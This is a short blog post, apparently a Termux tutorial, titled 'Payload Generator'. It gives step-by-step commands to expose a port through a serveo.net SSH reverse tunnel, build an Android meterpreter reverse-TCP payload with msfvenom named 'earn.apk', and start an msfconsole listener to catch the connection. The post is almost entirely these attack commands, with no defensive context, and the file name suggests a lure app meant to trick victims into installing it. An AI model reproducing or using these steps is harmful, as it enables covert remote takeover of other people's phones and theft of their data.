PAYLOAD GENERATOR for termux

PAYLOAD GENERATOR


$ pkg install openssh
$ ssh -R 0:localhost:1492 serveo.net

NEW PAGE

$ msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=(port) -o /sdcard/earn.apk

NEW PAGE

$ msfconsole
$ set PAYLOAD android/meterpreter/reverse_tcp
$ set LHOST (localhost)
$ set LPORT (port)
$ exploit

No comments:

Post a Comment

How to create the code behind the class in cpp programming using Microsoft Visual Sytudio.mp4

  Download  How to create the code behind the class in cpp programming using Microsoft Visual Sytudio.mp4 Creating the code behind a class i...